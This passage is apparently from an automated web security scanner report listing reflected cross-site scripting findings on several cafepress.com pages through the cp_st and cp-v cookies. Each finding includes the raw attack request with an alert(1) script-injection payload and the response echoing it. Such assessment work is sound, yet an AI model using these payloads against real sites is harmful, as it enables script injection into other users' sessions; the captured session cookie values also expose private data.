   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/addtocarthelper.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a79f</script><script>alert(1)</script>f30bd18751f was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4a79f</script><script>alert(1)</script>f30bd18751f; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
ntCoent-Length: 41343
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 41343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
ryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/cp/addtocart.aspx'
window.cafepress.tealeaf.searchTerm = '4a79f</script><script>alert(1)</script>f30bd18751f'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/about/

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4954"-alert(1)-"ab20618713b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 46269
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/about/

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d2b</script><script>alert(1)</script>e9999fa4cb2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=55d2b</script><script>alert(1)</script>e9999fa4cb2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 46295
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/info/about/index.aspx'
window.cafepress.tealeaf.searchTerm = '55d2b</script><script>alert(1)</script>e9999fa4cb2'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe61"-alert(1)-"a4da02b5a1a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58704
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1161</script><script>alert(1)</script>2e613423535 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1161</script><script>alert(1)</script>2e613423535; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 58725
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HelpPage'
window.cafepress.tealeaf.searchTerm = 'f1161</script><script>alert(1)</script>2e613423535'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/tos.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d434d"-alert(1)-"e31525dd84b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/help/tos.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 